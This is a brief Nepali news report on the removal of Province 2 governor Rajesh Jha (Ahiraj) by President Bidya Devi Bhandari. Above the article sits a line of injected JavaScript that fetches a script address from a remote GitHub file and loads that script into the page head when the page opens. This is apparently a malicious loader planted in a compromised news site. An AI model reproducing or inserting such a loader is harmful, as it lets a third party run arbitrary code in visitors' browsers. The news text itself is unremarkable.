;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
१भदौ, काठमाडौं | प्रदेश २ का प्रदेश प्रमुख राजेश झा (अहिराज) पदमुक्त भएका छन् | सरकारको सिफारिसमा रास्ट्रपति विध्यादेवी भण्डारीले झालाई प्रदेश प्रमुखको पदबाट मुक्त गरेको रास्ट्रपति कार्यालयका प्रवक्ता जगन्नाथ पन्तले जानकारी दिए |
अहिराजलाई केपी शर्मा ओली नेतृत्वको सरकारले फागुन २०७७ मा प्रदेश प्रमुख नियुक्त गरेका थिए |
फेसबुक प्रतिक्रियाहरु